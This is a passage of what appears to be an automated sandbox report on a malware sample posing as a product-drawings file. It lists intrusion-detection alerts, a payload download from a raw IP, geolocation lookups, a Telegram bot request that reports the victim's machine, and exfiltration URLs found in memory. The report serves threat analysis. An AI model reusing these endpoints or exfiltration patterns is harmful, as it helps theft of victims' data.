                Source: Joe Sandbox ViewASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49809 -> 64.188.18.75:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49810 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49812 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49816 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49815 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49814 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49817 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49818 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49819 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49813 -> 172.67.177.134:443
                Source: global trafficTCP traffic: 192.168.11.30:49821 -> 185.230.214.164:587
                Source: global trafficHTTP traffic detected: GET /ReySnONaTTPqhXrIqUlWWanbq212.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 64.188.18.75Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.30:49811 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /ReySnONaTTPqhXrIqUlWWanbq212.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 64.188.18.75Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 24 Sep 2024 14:31:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046DC000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22138896008.0000000033CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.bin
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.binp
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE4000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BD2763DD2
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.000000003496A000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/79.127.132.20
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/79.127.132.20$
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
